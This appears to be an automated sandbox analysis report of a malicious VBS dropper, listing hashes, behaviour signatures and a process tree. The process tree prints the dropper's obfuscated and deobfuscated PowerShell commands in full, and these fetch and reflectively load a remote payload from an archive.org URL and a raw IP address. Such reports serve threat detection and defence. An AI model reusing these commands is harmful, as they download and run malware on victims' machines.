Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
02-10-2024 07:19
General
-
Target
f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
-
Size
283KB
-
MD5
0c6c4542c1abc5fc3d5eab3e4ab3793a
-
SHA1
288dfb240061530c2c73ae4183b7330623e94a69
-
SHA256
f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
-
SHA512
7c3e22629060d8b18f1e88cbcb946d470599ac14699c75a7c1bf5cec0e174b8b3552eb6ec580defa747cb4cd5d9bfcc56e4ee9aa3dd366ed4272f88718ed8e2b
-
SSDEEP
6144:krHUuR5e0zLMcgGkkurXmTX/lb+rsb4Okiy+3kPvvA:kr0uR5e0nMc/kLrWTX/lb+rsb4Okiy47
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD54d11fbe04b0c02e47530e39868c91315
SHA17df3bb95a5925df0788c923abf499fe4217321a7
SHA2561f186280387cec6f6cf6f5ce29e2a9083690aec62dfc4036edde6550a4a4ee7a
SHA512d83707d0b46a4a4f3aafaa43257e48efa9004975139e50dbebb003d8870beb024f13ebfdb6426ee84d82425ac7bf7bf20c0da3b156d4fa9656d88d1c49e1e032
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB